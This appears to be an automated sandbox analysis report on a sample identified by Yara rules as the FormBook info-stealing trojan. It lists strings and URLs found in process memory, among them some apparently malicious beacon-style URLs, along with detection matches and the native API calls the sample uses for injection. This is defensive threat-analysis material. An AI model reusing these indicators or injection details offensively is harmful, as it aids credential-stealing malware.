            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C400%2C500%2C700%7CRoboto
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
            Source: write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21876343.js
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000015.00000002.4523478744.0000000003019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000015.00000002.4523478744.0000000003019000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2hh
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000015.00000002.4523478744.0000000003019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000015.00000003.2560137531.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://themeisle.com
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: write.exe, 00000015.00000002.4525142132.0000000005DFC000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.00000000034FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: write.exe, 00000015.00000002.4525142132.0000000005AD8000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.00000000031D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.magnoliahairandco.com/fkxp?kH=00U8ENLHk&TTv82Lg=%2F8gewv%2F74QCfxJQQ58xYAEc5kagwqNCJuIN4
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=zhuan-tou.com
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/blog/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/comments/feed/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/feed/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/kontakt/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/portfolio/
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/projekt-details/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/sample-page/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/ueber/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/verkehrswende/
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/wp-json/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.witoharmuth.de/xmlrpc.php?rsd
            Source: write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zijrmf.com/register

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0042AFB3 NtClose,12_2_0042AFB3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412B60 NtClose,LdrInitializeThunk,12_2_01412B60
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_01412DF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_01412C70
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014135C0 NtCreateMutant,LdrInitializeThunk,12_2_014135C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01414340 NtSetContextThread,12_2_01414340
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01414650 NtSuspendThread,12_2_01414650
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412BE0 NtQueryValueKey,12_2_01412BE0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412BF0 NtAllocateVirtualMemory,12_2_01412BF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412B80 NtQueryInformationFile,12_2_01412B80
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412BA0 NtEnumerateValueKey,12_2_01412BA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412AD0 NtReadFile,12_2_01412AD0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412AF0 NtWriteFile,12_2_01412AF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412AB0 NtWaitForSingleObject,12_2_01412AB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412D00 NtSetInformationFile,12_2_01412D00
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412D10 NtMapViewOfSection,12_2_01412D10
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412D30 NtUnmapViewOfSection,12_2_01412D30
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412DD0 NtDelayExecution,12_2_01412DD0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412DB0 NtEnumerateKey,12_2_01412DB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412C60 NtCreateKey,12_2_01412C60
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412C00 NtQueryInformationProcess,12_2_01412C00
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412CC0 NtQueryVirtualMemory,12_2_01412CC0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412CF0 NtOpenProcess,12_2_01412CF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412CA0 NtQueryInformationToken,12_2_01412CA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412F60 NtCreateProcessEx,12_2_01412F60
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412F30 NtCreateSection,12_2_01412F30
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412FE0 NtCreateFile,12_2_01412FE0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412F90 NtProtectVirtualMemory,12_2_01412F90
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412FA0 NtQuerySection,12_2_01412FA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412FB0 NtResumeThread,12_2_01412FB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412E30 NtWriteVirtualMemory,12_2_01412E30
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412EE0 NtQueueApcThread,12_2_01412EE0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412E80 NtReadVirtualMemory,12_2_01412E80
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412EA0 NtAdjustPrivilegesToken,12_2_01412EA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01413010 NtOpenDirectoryObject,12_2_01413010
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01413090 NtSetValueKey,12_2_01413090
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014139B0 NtGetContextThread,12_2_014139B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01413D70 NtOpenThread,12_2_01413D70
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01413D10 NtOpenProcessToken,12_2_01413D10
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_056FDE740_2_056FDE74
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_058071B00_2_058071B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_058000330_2_05800033
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_058000400_2_05800040
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_058014980_2_05801498
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_058071A00_2_058071A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077DAEB30_2_077DAEB3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D9D3F0_2_077D9D3F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D4BD80_2_077D4BD8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077DA2A30_2_077DA2A3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D61000_2_077D6100
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D70780_2_077D7078
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D08180_2_077D0818
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D98C80_2_077D98C8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D6F700_2_077D6F70
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D7F680_2_077D7F68
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D7F580_2_077D7F58
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077DAF080_2_077DAF08
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077DEFB80_2_077DEFB8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D8E280_2_077D8E28
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077DAEF80_2_077DAEF8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D96900_2_077D9690
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D96830_2_077D9683
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D94180_2_077D9418
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D940B0_2_077D940B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D9CCC0_2_077D9CCC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D9CB70_2_077D9CB7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D4B480_2_077D4B48
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D8B180_2_077D8B18
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D8B080_2_077D8B08
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D5BA80_2_077D5BA8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D4B9B0_2_077D4B9B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D41010_2_077D4101
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D91E00_2_077D91E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_077D91D30_2_077D91D3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A1319B00_2_0A1319B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A130DB00_2_0A130DB0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A138B300_2_0A138B30
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A13ABA80_2_0A13ABA8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A1308000_2_0A130800
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A138F680_2_0A138F68
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A1393A00_2_0A1393A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0A1386F80_2_0A1386F8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 0_2_0DC309980_2_0DC30998
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040E03312_2_0040E033
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_004030D012_2_004030D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_004011E012_2_004011E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0042D3C312_2_0042D3C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040239012_2_00402390
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_004044F412_2_004044F4
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040FD9312_2_0040FD93
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040260C12_2_0040260C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040261012_2_00402610
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0041668312_2_00416683
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0040FFB312_2_0040FFB3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0146815812_2_01468158
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D010012_2_013D0100
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147A11812_2_0147A118
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014981CC12_2_014981CC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A01AA12_2_014A01AA
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014941A212_2_014941A2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147200012_2_01472000
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149A35212_2_0149A352
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A03E612_2_014A03E6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE3F012_2_013EE3F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148027412_2_01480274
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014602C012_2_014602C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E053512_2_013E0535
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A059112_2_014A0591
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149244612_2_01492446
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148442012_2_01484420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148E4F612_2_0148E4F6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140475012_2_01404750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E077012_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DC7C012_2_013DC7C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FC6E012_2_013FC6E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F696212_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A012_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014AA9A612_2_014AA9A6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EA84012_2_013EA840
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E284012_2_013E2840
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C68B812_2_013C68B8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E8F012_2_0140E8F0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149AB4012_2_0149AB40
